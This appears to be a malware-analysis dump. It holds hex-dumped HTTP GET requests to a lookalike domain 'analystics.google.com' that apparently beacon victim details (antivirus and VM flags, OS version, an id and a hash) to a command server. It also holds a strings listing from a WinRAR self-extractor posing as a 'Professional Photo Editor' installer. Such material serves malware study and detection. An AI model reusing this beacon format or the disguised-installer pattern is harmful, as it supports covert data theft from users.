0x000000a0 (00160)   79672f77 35444a6b 6c2b7666 6232334b   yg/w5DJkl+vfb23K
0x000000b0 (00176)   412b472f 36764234 372b7158 7a4f3435   A+G/6vB47+qXzO45
0x000000c0 (00192)   47633975 7a324b71 742b6b73 66204854   Gc9uz2Kqt+ksf HT
0x000000d0 (00208)   54502f31 2e310d0a 486f7374 3a20616e   TP/1.1..Host: an
0x000000e0 (00224)   616c7973 74696373 2e676f6f 676c652e   alystics.google.
0x000000f0 (00240)   636f6d0d 0a0d0a                       com....

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d31 31343526   XX0000&key=1145&
0x00000040 (00064)   61763d30 26766d3d 3026616c 3d302670   av=0&vm=0&al=0&p
0x00000050 (00080)   3d393626 6f733d35 2e312e32 3630302e   =96&os=5.1.2600.
0x00000060 (00096)   33267a3d 34353826 68617368 3d437643   3&z=458&hash=CvC
0x00000070 (00112)   6e426a56 6a38494f 4d333341 394c664f   nBjVj8IOM33A9LfO
0x00000080 (00128)   4764426b 6e6a7939 61577a41 4a464538   GdBknjy9aWzAJFE8
0x00000090 (00144)   4a783772 48745554 37765a36 317a6757   Jx7rHtUT7vZ61zgW
0x000000a0 (00160)   79672f77 35444a6b 6c2b7666 6232334b   yg/w5DJkl+vfb23K
0x000000b0 (00176)   412b472f 36764234 372b7158 7a4f3435   A+G/6vB47+qXzO45
0x000000c0 (00192)   4763312f 69645077 4f446e71 63204854   Gc1/idPwODnqc HT
0x000000d0 (00208)   54502f31 2e310d0a 486f7374 3a20616e   TP/1.1..Host: an
0x000000e0 (00224)   616c7973 74696373 2e676f6f 676c652e   alystics.google.
0x000000f0 (00240)   636f6d0d 0a0d0a                       com....


Strings
strcatVirtualProtect
.
..
..
..\a...
w.
W78..
I
..
\
.CC
 

 1993-%d
Accept
|;bI&
Bro&wse...
by Alexander Roshal
bytes
Cancel
&Cancel
Cannot create folder %s
Cannot create %s
Cannot open %s
Close
Confirm file replace
Copyright 
CRC failed in %s
DCRC failed in the encrypted file %s. Corrupt file or wrong password.
Decline
&Destination folder
eRichEdit
ErroraErrors encountered while performing the operation
Extract
Extracting files to %s folder$Extracting files to temporary folder
Extracting from %s
Extracting %s
Extraction progress
|f.,
File close error
folder is not accessiblelSome files could not be created.
                                 H
         (((((                  H
         h((((                  H
~hRichEdit20W
Install
	jmsctls_progress32
KERNEL32.DLL
License
LICENSEDLG	RENAMEDLG
Look at the information window for more details
modified on
mscoree.dll
MS Shell Dlg 2
Next volume
Not enough memory
No to A&ll
Packed data CRC failed in %s
Please close all applications, reboot Windows and restart this installation\Some installation files are corrupt.
Please download a fresh copy and retry the installation
Read error
Rename
&Rename
Rename file
REPLACEFILEDLG
Select destination folder
Skipping %s
STARTDLG
The archive comment is corrupt
The archive header is corrupt
The file "%s" header is corrupt%The archive comment header is corrupt
The following file already exists
The required volume is absent2The archive is either in unknown format or damaged
	TITLE_BMP
TITLE_BMP
=Total path and file name length must not exceed %d characters
Unexpected end of archive
Unknown method in %s
WinRAR self-extracting archive
with this one?
Would you like to replace the existing file
Wrong password for %s&Write error. Probably the disk is full
&Yes
Yes to &All
^@@@@@
                          
+----(
+@-@+*
 !"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
 !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
 !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~
))020302130312131303131I13613373373373I67I37I6ILI7I7LIHLLIHLLLQLRLQRLRRRRQLLLIL5LLLLLLLLLRRLR>RLVRTRTRTTVTWWWWWWWWWaWWTWW`TWW`TW``WhTT`TW```T``Wh`h`hbhhc`h`h`h`hchhchhjhjhjhhjhkhkhkkhkkkhkkhkkhkkhkkikkhkhkkhkhkhhkhhjhjhhjhhhhch`hjhhhb`hhhahhahTW`ahWhbWha0
0A@@Ju
0_bOq(V.cnc>1
@|0l#_
0 \@lN}Z3Q0
0MMQMSMM6"
0MXSYVM2(
0^plp_pp^L
<0Q,j/
0SSSSS
0Y^]^SM1(
1	\\)(
.1.117O[ry~tmR.
1C!3Q#A
 1!cKT
+|<1NH
1SZZSN1
1U[\U7,
-1%}Z.
1Z[]d[ZU7
1Zx2_o
2Aku+au
2Am!}1
@@+2C@BAC-CBDDA2A-A-@)
^-----+-2-D--D-BD6BDFHDD6DEA-(
;~2dvQ
2EKMGGMG2)
2los#T`s~
2sZUSUZSNH.
2tSSUSSNH,
2yZYUYSZUNH1"
3~[\a\fZZd[aZZZZUO7L767717777HOU[dfWZO7777777O7OUagngeaaOOOO>OOOOTU`antvzuvu
3MJ6D2B--,
3MJJKMJ62
,.3M[]]][Z]d]]d[\][[]d]deeeeeWO5/1LWgtttvvv
3~"n-Q
3[^^^^p^X3
3q#au=uA
3|QNaHq(
3XSXQG1
*3Yc {
""("")",".".".#........4.040.4015414154555555<57>5>7>7>7>L>7>L>L>R>L>R>LTR>LTR>R>R>R>R>R>R>R>R>LT>L>L>>L>L>L>L>5>7>7>5<57<555555514541414040.55LLW
;=4'&4w
46SSSRM6(
(48saB{S
$ '4999
%4hkjkk
%%%'4>iowkW5
4(MPPKMJ62(
;4NI1,,
?4Odntv
59>bArzNooq
+5F[uSDC
5Nmp=Y
5wwwWR5405TWiw
,-6-6D6-D6-6EHMMYZZ]d]]eeeempnmrprrrmrsrtttzvttvumnegef[degervvu
6'c=$8X
	*6DD6EIHKMQH1
6GKMXJF*
6hFx4"
6hFxFXvHV
6hFxVH
6hFxVHfXv
6hFxVIgYw
6hFxVXvHv
6JGMPMJSMSPF0
6SMQM0
6SSSJ1("=
6SSSQH1
6SSSSUQRNLU[d]Z\ZSZ\erry
6SY[SZR1
6S[ZYVQH1/
	6XZSQN6
6^[^ZZ]UH"
71}E8h
796IFYVDV
	7d[da]dWN/
7rrlU1
8$0feemgmggpmrrrrmnrrrtogeaaUWfnwzv
8##.5>aw
'8''99=?
'8%'999?
'8~C)GT;
8xnL+U
	|9!)1\cIy;Y
9"7U[U7.
 '99;;9:;;4R>>
9$#dttyrma7
9]P"&=
9"Ulpme[7"
;9''$!!&#W
9wIK4}
A|0l _
A}0l _
((,-,A-26-E6HHNNSU[]didiememmrmrmrmmgmeigmemmrrrsvtv{u
A[2b1C`
@@@A--@+@-A@-@+
^@AAA@2@A+-@--++@-@+-AADDC-(
abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZ
^ACAC-D++-+++++++--BAGGEDA-*
+AD--(
^+---A-DADDDADDAGDBDCDGB6DD-)
#agdaU"
AGGGKGGGGGGF(
ahYxA@
An application has made an attempt to load the C runtime library incorrectly.
AP}(vxT
-A=Q2a"qR
-a=q-a=qM
-a=Q-a=qM
- Attempt to initialize the CRT more than once.
- Attempt to use MSIL code from this assembly during native code initialization
August
'avtvzvzvttn[`1
aWaWAwA
AwAWAwA
AwQ l=q
AxQ-a=
a >z'Ga(@b
(-BD6MMMYZ]Zede]dpedeeerrprrgmdgsrtrzv{~
(+BDD-+
*++----BDEIJMMMSQN3,
)---+++B-E6-,
BeginPaint
b$i?-$Os>
.\Blt|
b?r1-a
>bTRj5x
@~bURk
BxrsjqCm
)c8P|j
(c8zmStN
cc?<4#!
+CDGCEGGCGA(
ChZ4POV
<cjjc`4## 
CN3q#a
CorExitProcess
)CPCKGCPCG-
CreateWindowExA
- CRT not initialized
CtLm(Ql
}CUAq#
^D+@++
^D2D2EGHKMGMMKGJMGPKMGMGQMMME-
**D6MHQMSOH6H6NMMMNMSSS\\deee]eeemee[ZZZSZSSZZd]gptttzrvvt{zz
@.data
DBCDA+
(d^BoH}1
DC9IeyV
DcISdG
^-D-D--+A+A-DAADABDA2AAD2GDD
dddd, MMMM dd, yyyy
)DDHMHMEH-
December
DecodePointer
DefWindowProcA
DeleteCriticalSection
DFKEGGEEGEF-
-DGGED2A)
DGGGEGDD)
DGMGHMGMKM36(
DGPKPPKJD
DispatchMessageA
DJJPKPGKMPJA(
DJMKJMJM6(
_D*^k5
DOMAIN error
D]P1M!U
dq2*87
[dR(O1
dsyty~yrQ"
=D]T}d]t=
DtNIf|
dvtfDV
eGUOE7u
eMk$<|e
EncodePointer
EnterCriticalSection
EQ-a=qM
essxyyseQ"
\e!x9Q
ExitProcess
	]e/"Z~
&E]ZH.`
e'z;	L
][f[da[edWd[ef[aeeaefaeeggeggegigggnggennogrnrnnorrnurutu
February
F[%:HXv
-f?JUu%(
-FKFEGHJPKMM-
- floating point support not loaded
FlsAlloc
FlsFree
FlsGetValue
FlsSetValue
:*fmr 
F:{pbQ
FreeEnvironmentStringsA
FreeEnvironmentStringsW
Friday
f+T|]P2
Fu8g+W
;$fvk`T>bik
fwbqq>
FxVH$Xv
{/G2fJ
G@CCCCCGB+
GCKCKKPGC0
(GCKGKGKDGD-(
GDI32.dll
GetACP
GetActiveWindow
GetCommandLineA
GetCPInfo
GetCurrentProcess
GetCurrentProcessId
GetCurrentThreadId
GetEnvironmentStrings
GetEnvironmentStringsW
GetFileType
GetLastActivePopup
GetLastError
GetLocaleInfoA
GetMessageA
GetModuleFileNameA
GetModuleHandleA
GetModuleHandleW
GetOEMCP
GetProcAddress
GetProcessHeap
GetProcessWindowStation
GetStartupInfoA
GetStdHandle
GetStringTypeA
GetStringTypeW
GetSystemTimeAsFileTime
GetTickCount
GetUserObjectInformationA
GetVersionExA
Gffff`
?ggcib`5#
.GJ-s2
	)GKCPKGD(
Glxxsxsxspxspsxysyxytyzyyyyytytyyysyyyyyrsrpppp]]^\Y^Z^]^d]pppprprxrssyy{~{~
g= Nu6AFFK
(GPKPPJA(
GXPXPK3(
;	h`5#8
hAM"}cR
HeapAlloc
HeapCreate
HeapFree
HeapReAlloc
HeapSize
_HGDGDKEFEEGJJGMGMKGMGEKGMKH2)
-HGGM6
HH:mm:ss
HLY,y<y
HMSPMSM6(
Hq(E1Y
h$s2HcX
HSRM60
h]::TAF
hU,[<Z
HXMSXR1
HYSSNH)
HZ.SH`
HZ^ZQ1
%I1!ls
?:I7JF
iaeaefeaffedageigiegegigeigggingenggrrnnmnrnnounroouvuuuuuuzuv
>idxyQ
iGoWVbH
i*gQLuH\
IMQSSYUSSUM6
InitializeCriticalSectionAndSpinCount
InterlockedDecrement
InterlockedIncrement
I^^^]p^^[6
IsDebuggerPresent
IsValidCodePage
|Iu*93
i),x\h
ixysyyymU
i\y,	<
] i+y;	K
IYYQ2,""06LNIOX[]pepmreeZN.
izyzyv~mO"
j1SSQMN1
j>/& 8
JanFebMarAprMayJunJulAugSepOctNovDec
January
jchOOUSMMM-
=jEiw:
jG)iqf
j.IH7,
?jjjh=<#
j@j ^V
Jl^pp^ppZ7
JRGc!x
JSXJD0
Jv=a-Q
k=--<.
k`/! 8
k?<9<;
kb>><>><>```k
K%c	fU
kernel32.dll
KERNEL32.dll
%kfWh=
kh><<=`hk
?,KJMSJMJH*
knG>mN}^
k'o&x =
KPKPXK3)
KQMD32)(
Kw;f*V
>kXOmm
)KXXXXPM(
l2-D-(
{L5D0y
L`\9l)|4
L	()B)
}+ lBt2~"	nA
LCMapStringA
LCMapStringW
lD6-6-----*B--6B6DHHMEMHHD6--*
>lE5VH8
LeaveCriticalSection
Lexepe]U0:
lG2D2(
Lh\|l[|V
LI\Yli|9
Ll.|	]
Lm\xlG|W
LoadAcceleratorsA
LoadLibraryA
	LpxlU.
L%\Tl)|9
L}\tl_|K
l)zxOvQ
"m}}}}
M!]0-@=S
M#]2-B=R
M&]5-E=U
m6$FnW<
M+]7-G{
MessageBoxA
Microsoft Visual C++ Runtime Library
Mlpppqpm[3
MM/dd/yy
Monday
MPSSMQH.
Mq<c.m
-MQSG6
)MQSNS1
#MSML61(
MUI2/Q
MultiByteToWideChar
MXXSKI-
MY[XZSM1"
{n\>'		]
N4z;c*
 n8t$D
na*_n#U
N[]d[]]\\aZRNUZ]dZL1"
NEK7k}
NeZa]d[U7"
njb,V<
- not enough space for arguments
- not enough space for environment
- not enough space for locale information
- not enough space for lowio initialization
- not enough space for _onexit/atexit table
- not enough space for stdio initialization
- not enough space for thread data
November
(:^NPG
@nP~`YgI
NQSSSNSSMSMMMMHEMSMSSZYd[dd[degpeemgeedZYUSOMMSMSZZZ[dZZYUSMQMUSS]grv
nrJymBtth%
n+>RNS^
ns~;NW^
ntdll.dll
N[ZZR7"
NZZSU6,
o6}CsV
October
"Odggrrnrgorrrotttutvuz
?&#Odgtuutuututzvuz
Odmgenmernmrnrrrorttrtvurvuvvzv
OedaeUO1,
Ofed]aUO4"
"Ofgiorrurrnvutu
of*,tS
oicJci
O#Q"c0r
}O'>-ttO
owh# =
Owwwwp
P|Cju[eH
pe6C!'m
&pfPfp&
pGGDGIMGMMKMJMJMKQMSJMKMSPSKMJ-
Please contact the application's support team for more information.
p(pHp(p
PPPPPPPP
)PPXSXQ2(
Professional Photo Editor (PPE)
Program: 
<program name unknown>
)pthJ8
- pure virtual function call
PW)r<0
)PXPXPPC)
pxsxsxs]L
|pYl-p
)PYXXXS3
(q}1rH
Q4a%qZ
)Q9)CS^
Q-a=qL
Q-a=qM
Q'a=qM
Q-aX"!`1
qED2D(
qJ2H2(
:@_QKe 
qMDHD)
@qMHIH)
&)]qppxqx]I
QSH616INZZ[Z[Zd]YeZ]epre[O.
QSXSQN0
,QSY[X]]Z7.
QueryPerformanceCounter
qz0}h}
rcbCRc
R}Cms]cM
`.rdata
rDbT lB
Rectangle
RegisterClassExA
RIVX(G)ov
>rozvvzw
,[rpr[U7/"
]$rS-2=
RtlUnwind
runtime error 
Runtime Error!
rYbaR)|9
r{yV_0
RZ1" =
;S1\!6t
>s1ccF
s1c#TdS"
Saturday
SCRr-j
s"c\`|t
 SECdAqL
S]e[H,#
Sepp[L"
September
SetHandleCount
SetLastError
SetUnhandledExceptionFilter
S{=&\F
sHMHMRSMMMQMJMKMJKJJMMQQSSSSMSJM6H66D6---(
ShowWindow
SIBYriby
SING error
sJNMNH(
.Sl}M3
]sMc~P`O
SR&2vP
sSMMM1
+sSQMQH0
"SSYYSYYZSYUML6I7HLH7HNSZ^Z][d]epemprmporrrsrsrsttteWVaenstrrmrgrpnrtt
SSZSS6,
strstr
Sunday
SunMonTueWedThuFriSat
SunSystemClass
(SXSPXQ6
s{ymO.
"SYXSXS6
S[]\]\[ZR6=
~ta7<a
tehu)B
TerminateProcess
This application has requested the Runtime to terminate it in an unusual way.
This indicates a bug in your application.
This indicates a bug in your application. It is most likely the result of calling an MSIL-compiled (/clr) function from a native constructor or from DllMain.
!This program cannot be run in DOS mode.
Thursday
< tK<	tG
TLOSS error
TlsAlloc
TlsFree
TlsGetValue
TlsSetValue
{T.MGtT
tp8Oi0
TranslateAcceleratorA
TranslateMessage
t"SS9]
[tttvvtmWO"
{tt{vv
~{ttytt{~ym3
t$<"u	3
Tuesday
;t$,v-
tvrtrtvu
t+WWVPV
]u	!}B
uBhn&B
u~d!wYD
U]eeedpeeneepeermpgeeaR7
#Uef[U7/,
U{EhvfXD
U{EhvXfI
U	Ex7k'U
@UFspb=/
UFxgzTkE
~$}uHeoc
uLeZUhQaF
Umrsyztsnorvzv~vzvzv{~
- unable to initialize heap
- unable to open console device
- unexpected heap error
- unexpected multithread lock error
UnhandledExceptionFilter
{uogaO
UpdateWindow
UprpmpZO1,/5R[daZWemt{
UQPXY]Y[
URPQQh WB
USER32.dll
USER32.DLL
usHF<s
UsQS%33
{utreddeegszvzw
Uu0N	`%'b
UxFV|Rm@
UyaIy4
U]Y[]YS1"
UZ\ZZ\ZZUOL.9
vcO#8% 
#.V>Gf0
VirtualAlloc
VirtualFree
v	N+D$
@|Vniu	x%N
VsfO}6hFxVHfXv
VSYZQM.
vXuo]:
w\3;ns 
W|AYOx.
w]cUSBCrVrL
Wednesday
>>W)f*v
w%,g&<P|
W%g+|X%u
.wi}~c
WideCharToMultiByte
WiT54"
|Wi-yid%r+
w/Mrd%
WriteFile
wSSSSMH.
wuknkoo
wvnkgcaT74//"
w`Xj%rT
'	WyGVHVhG
<#WZU7'
X@@@@@
x0`@_	
 X]9VW
Xc[yI"yZ
XDi\81
&Xe@n_
=$XHKR@
xL0#QdW
XoH2pUtZ
.xVHfXF
~~~y~~
y0fhk-
"y8w=Xk
Y9.J%$
y+eipy
yGMQMMMGHEED-+*******-D-B6DGH6D.*,02HMMMMHFHDF6*(
!yGrE-g
y(hlX|!
-y-I%>
Y,i<y(
Y,i;y3
y+JiG!z
Yl(4$-
}}y{lF
y.o#BayS
}|}{|y|qyxyxl+
y~SZ;3=Tb
>=Yt1j
}}||y|y|~}}
{~yye3
Y%Yl)w(
}{~yyyssp3
}{}|{yyyysl2
~{~~yzyl3
>]z;}+
 $]{~z~
*$.}z+
Z0r4et
z2p</M
z6$^ n
Z[d]ddZU1
'.Z]eeeedeeeeegmemdedZO1
z@jP$@
z$Kl)|9
Zpeme[W1
ZrAoq\bJ
#ZrmeZTH."
z{ttmr]Z[ZSZSZ[eemrgiaW<<144<>`c
zTyB~msc
Zwf0+D
~{~zyyz{z}
ZZWZWdd[ZeZfaZdadaZfWdZf[adaeageefidififfiggeginrgnumnnnonuounvuut
#ZZ[ZH/
ZZZZWZZZZZZUN1.